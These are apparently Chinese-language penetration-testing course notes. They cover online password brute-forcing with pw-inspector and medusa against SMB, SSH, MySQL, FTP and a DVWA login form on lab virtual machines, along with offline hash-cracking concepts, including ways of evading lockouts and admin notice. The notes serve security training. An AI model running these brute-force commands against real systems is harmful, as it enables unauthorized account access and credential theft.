在线密码破解-hydra、在线密码破解-medusa、离线密码破解

在线密码破解—–hydra

pw-inspector

- 按长度和字符集筛选字典                    

- pw-inspector -i /usr/share/wordlists/nmap.lst -o p.lst -l

- pw-inspector -i /usr/share/wordlists/nmap.lst -o P.lst -u

密码破解效率

- 密码复杂度（字典命中率）              

- 带宽、协议、服务器性能、客户端性能                        

- 锁定阈值                                

- 单位时间最大登陆请求次数

root@K:~# pw-inspector -i /usr/share/wordlists/nmap.lst -o p.lst -l

root@K:~# cat /usr/share/wordlists/nmap.lst

root@K:~# more p.lst

root@K:~# pw-inspector

PW-Inspector v0.2 (c) 2005 by van Hauser / THC [email protected] [http://www.thc.org]

Syntax: pw-inspector [-i FILE] [-o FILE] [-m MINLEN] [-M MAXLEN] [-c MINSETS] -l -u -n -p -s

Options:

-i FILE file to read passwords from (default: stdin)

-o FILE file to write valid passwords to (default: stdout)

-m MINLEN minimum length of a valid password

-M MAXLEN maximum length of a valid password

-c MINSETS the minimum number of sets required (default: all given)

Sets:

-l lowcase characters (a,b,c,d, etc.)

-u upcase characters (A,B,C,D, etc.)

-n numbers (1,2,3,4, etc.)

-p printable characters (which are not -l/-n/-p, e.g. $,!,/,(,*, etc.)

-s special characters - all others not withint the sets above

PW-Inspector reads passwords in and prints those which meet the requirements.

The return code is the number of valid passwords found, 0 if none was found.

Use for security: check passwords, if 0 is returned, reject password choice.

Use for hacking: trim your dictionary file to the pw requirements of the target.

Usage only allowed for legal purposes.

root@K:~# pw-inspector -i /usr/share/wordlists/nmap.lst -o p.lst -l -m 3 -M 5

root@K:~# more p.lst

在线密码破解—–medusa

Hydra的缺点

- 稳定性差，程序时常崩溃                  

- 速度控制不好，容易触发服务屏蔽或锁死机制

- 每主机新建进程，每服务新建实例          

- 大量目标破解时性能差                    

Medusa的特点

- 稳定性好                                

- 速度控制得当                            

- 基于线程                                

- 支持模块少于hydra（不支持RDP ）         

- WEB-Form支持存在缺陷

root@k:~# medusa -h

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks [email protected]

medusa: option requires an argument – ‘h’

CRITICAL: Unknown error processing command-line options.

ALERT: Host information must be supplied.

Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]

-h [TEXT] : Target hostname or IP address

-H [FILE] : File containing target hostnames or IP addresses

-u [TEXT] : Username to test

-U [FILE] : File containing usernames to test

-p [TEXT] : Password to test

-P [FILE] : File containing passwords to test

-C [FILE] : File containing combo entries. See README for more information.

-O [FILE] : File to append log information to

-e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)

-M [TEXT] : Name of the module to execute (without the .mod extension)

-m [TEXT] : Parameter to pass to the module. This can be passed multiple times with a

             different parameter each time and they will all be sent to the module (i.e.

             -m Param1 -m Param2, etc.)

-d : Dump all known modules

-n [NUM] : Use for non-default TCP port number

-s : Enable SSL

-g [NUM] : Give up after trying to connect for NUM seconds (default 3)

-r [NUM] : Sleep NUM seconds between retry attempts (default 3)

-R [NUM] : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.

-c [NUM] : Time to wait in usec to verify socket is available (default 500 usec).

-t [NUM] : Total number of logins to be tested concurrently

-T [NUM] : Total number of hosts to be tested concurrently

-L : Parallelize logins using one username per thread. The default is to process

             the entire username before proceeding.

-f : Stop scanning host after first valid username/password found.

-F : Stop audit after first valid username/password found on any host.

-b : Suppress startup banner

-q : Display module’s usage information

-v [NUM] : Verbose level [0 - 6 (more)]

-w [NUM] : Error debug level [0 - 10 (more)]

-V : Display version

-Z [TEXT] : Resume scan based on map of previous scan

oot@k:~# medusa -d

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks [email protected]

Available modules in “.” :

Available modules in “/usr/lib/medusa/modules” :

+ cvs.mod : Brute force module for CVS sessions : version 2.0

+ ftp.mod : Brute force module for FTP/FTPS sessions : version 2.1

+ http.mod : Brute force module for HTTP : version 2.1

+ imap.mod : Brute force module for IMAP sessions : version 2.0

+ mssql.mod : Brute force module for M$-SQL sessions : version 2.0

+ mysql.mod : Brute force module for MySQL sessions : version 2.0

+ nntp.mod : Brute force module for NNTP sessions : version 2.0

+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0

+ pop3.mod : Brute force module for POP3 sessions : version 2.0

+ postgres.mod : Brute force module for PostgreSQL sessions : version 2.0

+ rexec.mod : Brute force module for REXEC sessions : version 2.0

+ rlogin.mod : Brute force module for RLOGIN sessions : version 2.0

+ rsh.mod : Brute force module for RSH sessions : version 2.0

+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.1

+ smtp-vrfy.mod : Brute force module for verifying SMTP accounts (VRFY/EXPN/RCPT TO) : version 2.1

+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0

+ snmp.mod : Brute force module for SNMP Community Strings : version 2.1

+ svn.mod : Brute force module for Subversion sessions : version 2.1

+ telnet.mod : Brute force module for telnet sessions : version 2.0

+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0

+ vnc.mod : Brute force module for VNC sessions : version 2.1

+ web-form.mod : Brute force module for web forms : version 2.1

+ wrapper.mod : Generic Wrapper Module : version 2.0

在线密码破解—–medusa

medusa -d

破解windows密码

- medusa -M smbnt -h 1.1.1.1 -u administrator -P pass.lst -e ns -F

破解Linux SSH密码

- medusa -M ssh -h 192.168.20.10 -u root -P pass.lst -e ns -F     

其他服务密码破解

- medusa -M mysql -h 1.1.1.1 -u root -P pass.lst -e ns -F         

- medusa -h 1.1.1.1 -u admin -P pass.lst -M web-form -m           

  FORM:"dvwa/login.php" -m DENY-SIGNAL:"login.php" -m FORM-       

  DATA:"post?user=username&pas=password&Login=Login"

msfadmin@metasploitable:~$ sudo passwd root

[sudo] password for msfadmin:

Enter new UNIX password:

Retype new UNIX password:

No password supplied

Enter new UNIX password:

Retype new UNIX password:

passwd: password updated successfully

root@K:~# medusa -M ssh -h 192.168.1.113 -e ns -F -u root -P /usr/share/wordlists/nmap.lst

root@K:~# grep 1234 /usr/share/wordlists/nmap.lst

root@K:~# grep ^1234% /usr/share/wordlists/nmap.lst

root@K:~# cat /usr/share/wordlists/nmap.lst | grep -v #

root@K:~# cat /usr/share/wordlists/nmap.lst | grep -v # > pass.lst

root@K:~# medusa -M ssh -h 192.168.1.113 -e ns -f -u root -P pass.lst

XP IP地址是192.168.1.118

C:\net user administrator zipper

root@K:~# medusa -M mebnt -h 192.168.1.118 -u administrator -P pass.lst -e ns -f

root@K:~# nmap P3306 192.168.1.113

Starting Nmap 7.12 ( https://nmap.org ) at 2016-04-21 23:00 CST

Nmap scan report for 192.168.1.113

Host is up (10.00036s latency).

PORT STATE SERVOCE

3306/tcp open mysql

MAC Address: 08:00:27:B0:3A:76 (Oracle Virtualbox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds

root@K:~# medusa -M mysql -h 192.168.1.113 -e ns -F -u root -P pass.lst

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks [email protected]

ACCOUNT CHECK: [mysql] Host: 192.168.1.113 (1 of 1, O complete) User: root (1 of 5000 complete) Password: (1 of 5000 complete)

ACCOUNT CHECK: [mysql] Host: 192.168.1.113 User: root Password: [SUCCESS]

root@K:~# medusa -M ftp -h 192.168.1.113 -e ns -F -u ftp -P pass.lst

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks [email protected]

ACCOUNT CHECK: [mysql] Host: 192.168.1.113 (1 of 1, O complete) User: root (1 of 5000 complete) Password: (1 of 5000 complete)

ACCOUNT CHECK: [mysql] Host: 192.168.1.113 User: root Password: [SUCCESS]

root@K:~# medusa -M ftp -h 192.168.1.113 -e ns -F -u ftp -P pass.lst -n 2121

root@K:~# medusa -h 192.168.1.113 -u admin -P pass.lst -M web-form -m FORM:”dvwa/login.php” -m DENY-SIGNAL:”login.php” -m FORM-DATA:”post?user=username&pas=password&Login=Login”

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks [email protected]

ERROR: The answer was NOT successfully received, understood, and accepted while trying admin 123456: error code 302

ACCOUNT XGWXK: [web-form] Host: 192.168.1.113 (1 of, 0 complete) User: admin (1 of 1, 0 complete) Password: 123456 (1 of 4998 complete)

root@K:~# medusa -M web-form -q

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks [email protected]

web-form.mod (2.1) Luciano Bello [email protected] :: Brute force module for web forms

Available module options:

USER-AGENT:? User-agent value. Default: “I’m not Mozilla, I’m Ming Mong”.

FORM:? Target form to request. Default: “/”

DENY-SIGNAL:? Authentication failure message. Attempt flagged as successful if text is not present in

                 server response. Default: "Login incorrect"

CUSTOM-HEADER:? Custom HTTP header.

                 More headers can be defined by using this option several times.

FORM-DATA:?

                 Methods and fields to send to web service. Valid methods are GET and POST. The actual form

                 data to be submitted should also be defined here. Specifically, the fields: username and

                 password. The username field must be the first, followed by the password field.

                 Default: "post?username=&password="

Usage example: “-M web-form -m USER-AGENT:”g3rg3 gerg” -m FORM:”webmail/index.php” -m DENY-SIGNAL:”deny!”

             -m FORM-DATA:"post?user=&pass=&submit=True" -m CUSTOM-HEADER:"Cookie: name=value"

在线密码破解—–medusa

- -n : 非默认端口   

- -s : 使用SSL连接  

- -T : 并发主机数   

medusa -M ftp -q

root@k:~# medusa -M ftp -q

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks [email protected]

ftp.mod (2.1) pMonkey [email protected] :: Brute force module for FTP/FTPS sessions

Available module options:

MODE:? (NORMAL*, EXPLICIT, IMPLICIT)

EXPLICIT: AUTH TLS Mode as defined in RFC 4217

 Explicit FTPS (FTP/SSL) connects to a FTP service in the clear. Prior to

 sending any credentials, however, an "AUTH TLS" command is issued and a

 SSL session is negotiated.

IMPLICIT: FTP over SSL (990/tcp)

 Implicit FTPS requires a SSL handshake to be performed before any FTP

 commands are sent. This service typically resides on tcp/990. If the user

 specifies this option or uses the "-n" (SSL) option, the module will

 default to this mode and tcp/990.

NORMAL

 The default behaviour if no MODE is specified. Authentication is attempted

 in the clear. If the server requests encryption for the given user,

 Explicit FTPS is utilized.

Example Usage:

medusa -M ftp -h host -u username -p password

medusa -M ftp -s -h host -u username -p password

medusa -M ftp -m MODE:EXPLICIT -h host -u username -p password

(*) Default value

离线密码破解

身份认证

- 禁止明文传输密码                                                

- 每次认证使用HASH算法加密密码传输）（HASH算法加密容易、解密困难）

- 服务器端用户数据库应加盐加密保存                                

破解思路

- 嗅探获取密码HASH                                                

- 利用漏洞登录服务器并从用户数据库获取密码HASH                    

- 识别HASH类型                    

  长度、字符集         

- 利用李璇破解工具碰撞密码HASH

离线密码破解

优势

- 离线不会触发密码锁定机制              

- 不会产生大量登录失败日志引起管理员注意

HASH识别工具

- hash-identifier                       

- Hashid                                

- 可能识别错误或无法识别

火狐插件hashr